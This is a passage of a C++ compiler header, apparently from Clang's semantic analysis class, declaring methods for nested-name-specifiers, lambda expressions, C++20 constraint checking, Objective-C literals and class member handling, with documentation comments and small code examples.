/// requires any cleanups, surround it with an ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
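/// For example (Microsoft extension; 'Base' and 'Derived' are illustrative):
/// \code
///   struct Derived : Base {
///     void f() { __super::f(); } // '__super::' names the base class scope
///   };
/// \endcode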
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates an info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case, no error message is emitted.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool pointed to by this parameter is set to 'true'
/// if the identifier is treated as if it were followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
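/// For example:
/// \code
///   typename T::template apply<U>::type t; // 'template apply<U>::'
/// \endcode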
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind,
Expr *TrailingRequiresClause);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
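/// For example:
/// \code
///   auto L = [x = 21 * 2] { return x; }; // init-capture of 'x'
/// \endcode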
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
/// Create a dummy variable within the DeclContext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++20.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// If it is not, a diagnostic is emitted, false is returned, and
/// PossibleNonPrimary will be set to true if the failure might be due to a
/// non-primary expression being used as an atomic constraint.
bool CheckConstraintExpression(const Expr *CE, Token NextToken = Token(),
bool *PossibleNonPrimary = nullptr,
bool IsTrailingRequiresClause = false);
private:
/// Caches pairs of template-like decls whose associated constraints were
/// checked for subsumption and whether or not the first's constraints did in
/// fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
/// Caches the normalized associated constraints of declarations (concepts or
/// constrained declarations). If an error occurred while normalizing the
/// associated constraints of the template or concept, nullptr will be cached
/// here.
llvm::DenseMap<NamedDecl *, NormalizedConstraint *>
NormalizationCache;
llvm::ContextualFoldingSet<ConstraintSatisfaction, const ASTContext &>
SatisfactionCache;
public:
const NormalizedConstraint *
getNormalizedAssociatedConstraints(
NamedDecl *ConstrainedDecl, ArrayRef<const Expr *> AssociatedConstraints);
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained as another declaration's, according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives true if D1 is at least as
/// constrained as D2, and false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// Diagnose the case where D1 is not at least as constrained as D2, but
/// would have been had a pair of the atomic constraints involved been
/// declared in a concept rather than repeated in two separate places in code.
/// \returns true if such a diagnostic was emitted, false otherwise.
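/// For example, partial ordering can order the 'f' overloads below but not
/// the 'g' overloads, because textually repeated constraint expressions are
/// distinct atomic constraints:
/// \code
///   template <typename T> concept Big = sizeof(T) > 4;
///   template <typename T> requires Big<T> void f(T);
///   template <typename T> requires Big<T> && true void f(T); // ordered
///   template <typename T> requires (sizeof(T) > 4) void g(T);
///   template <typename T> requires (sizeof(T) > 4) && true void g(T);
///   // the two 'sizeof' atoms are distinct, so neither 'g' subsumes the other
/// \endcode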
bool MaybeEmitAmbiguousAtomicConstraintsDiagnostic(NamedDecl *D1,
ArrayRef<const Expr *> AC1, NamedDecl *D2, ArrayRef<const Expr *> AC2);
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param Template the template-like entity that triggered the constraints
/// check (either a concept or a constrained entity).
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(
const NamedDecl *Template, ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange, ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful, emits a diagnostic and returns true if an error
/// occurred and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check whether the given function decl's trailing requires clause is
/// satisfied, if any. Returns false and updates Satisfaction with the
/// satisfaction verdict if successful, emits a diagnostic and returns true if
/// an error occurred and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckFunctionConstraints(const FunctionDecl *FD,
ConstraintSatisfaction &Satisfaction,
SourceLocation UsageLoc = SourceLocation());
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constraints are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
/// \param First whether this is the first time an unsatisfied constraint is
/// diagnosed for this error.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void DiagnoseRedeclarationConstraintMismatch(SourceLocation Old,
SourceLocation New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. The type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// Mark destructors of virtual bases of this class referenced. In the Itanium
/// C++ ABI, this is done when emitting a destructor for any non-abstract
/// class. In the Microsoft C++ ABI, this is done any time a class's
/// destructor is referenced.
void MarkVirtualBaseDestructorsReferenced(
SourceLocation Location, CXXRecordDecl *ClassDecl,
llvm::SmallPtrSetImpl<const RecordType *> *DirectVirtualBases = nullptr);
/// Do semantic checks to allow the complete destructor variant to be emitted
/// when the destructor is defined in another translation unit. In the Itanium
/// C++ ABI, destructor variants are emitted together. In the MS C++ ABI, they
/// can be emitted in separate TUs. To emit the complete variant, run a subset
/// of the checks performed when emitting a regular destructor.
void CheckCompleteDestructorVariant(SourceLocation CurrentLocation,
CXXDestructorDecl *Dtor);
/// The list of classes whose vtables have been used within
/// this translation unit, and the source locations at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called at some point later
/// when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator.
/// \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annotated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// ActOnBaseSpecifier - Parsed a base specifier
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
